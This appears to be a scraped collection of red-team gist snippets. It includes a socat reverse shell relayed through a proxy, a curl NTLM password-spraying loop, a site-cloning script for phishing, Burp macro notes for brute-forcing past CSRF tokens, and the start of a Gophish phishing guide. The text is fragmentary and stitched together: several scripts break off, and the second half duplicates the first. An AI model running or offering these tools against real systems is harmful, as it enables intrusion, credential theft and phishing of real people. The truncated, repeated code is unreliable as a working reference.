clandestination queencitycyber

## ddnsserver.py
#!/usr/bin/env python
"""
LICENSE http://www.apache.org/licenses/LICENSE-2.0
"""

import argparse
import datetime
import sys
import time
import threading

## tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
  Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
  and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
  Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing

## dns_server.py
from datetime import datetime
from time import sleep

from dnslib import DNSLabel, QTYPE, RD, RR
from dnslib import A, AAAA, CNAME, MX, NS, SOA, TXT
from dnslib.server import DNSServer

EPOCH = datetime(1970, 1, 1)
SERIAL = int((datetime.utcnow() - EPOCH).total_seconds())

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## netcat-webserver.sh
#! /bin/bash
sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done'
# Original (no sudo):
# while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done
# Raw (Skip filtering header lines):
# sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80; done'

## gist:e4245de93d0c0fc46ab025ae48e5db5a
while read user; do curl --ntlm -u '"$user":PASSWORD' URI -w 'size: %{size_download}\n' -o /dev/null; done < userlist.txt

## cloning.sh
#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"

## Red Team Phishing with Gophish.md

      
              1 file
            
          
              13 forks
            
          
              2 comments
            
          
              26 stars
            
          
                ozzi-
                / Red Team Phishing with Gophish.md
            
            
              Last active
              April 25, 2024 12:23
            
          
    Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign.
This is the basic lifecycle of your phishingn campaign:
+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+


## socat through proxy
# Listener on x.x.x.x:443:

socat file:`tty`,raw,echo=0 tcp-listen:443

# Reverse shell proxy server is at 10.10.10.1:8222:

socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

## getloggedon.py
#!/usr/bin/env python
# Copyright (c) 2012-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Gets logged on users via NetrWkstaUserEnum (requires admin on targets).
# Mostly adapted from netview.py and lookupsid.py
#
	#!/usr/bin/env python
	"""
	LICENSE http://www.apache.org/licenses/LICENSE-2.0
	"""

	import argparse
	import datetime
	import sys
	import time
	import threading
	## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
	# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## Burp csrf-rewritting macro
	- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
	Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
	and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
	Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
	- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
	from datetime import datetime
	from time import sleep

	from dnslib import DNSLabel, QTYPE, RD, RR
	from dnslib import A, AAAA, CNAME, MX, NS, SOA, TXT
	from dnslib.server import DNSServer

	EPOCH = datetime(1970, 1, 1)
	SERIAL = int((datetime.utcnow() - EPOCH).total_seconds())
	#! /bin/bash
	sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" \|nc -l -p 80 \|egrep -v "Accept" \|egrep -v "Content-Length" \|egrep -v "Host" \|egrep -vi "cache"; done'
	# Original (no sudo):
	# while true; do echo "HTTP/1.1 200 OK\n\n" \|nc -l -p 80 \|egrep -v "Accept" \|egrep -v "Content-Length" \|egrep -v "Host" \|egrep -vi "cache"; done
	# Raw (Skip filtering header lines):
	# sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" \|nc -l -p 80; done'
	#!/bin/bash
	echo "Cloning $1"
	wget $1 -O index.html &> /dev/null
	TAG="<base href=\"$1\"/></head>"
	sed '/<\/head>/i\'"$TAG" index.html \| tee index.html &> /dev/null
	echo "index.html was saved and modified"
	# Listener on x.x.x.x:443:

	socat file:`tty`,raw,echo=0 tcp-listen:443

	# Reverse shell proxy server is at 10.10.10.1:8222:

	socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
	socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
	#!/usr/bin/env python
	# Copyright (c) 2012-2018 CORE Security Technologies
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# Gets logged on users via NetrWkstaUserEnum (requires admin on targets).
	# Mostly adapted from netview.py and lookupsid.py
	#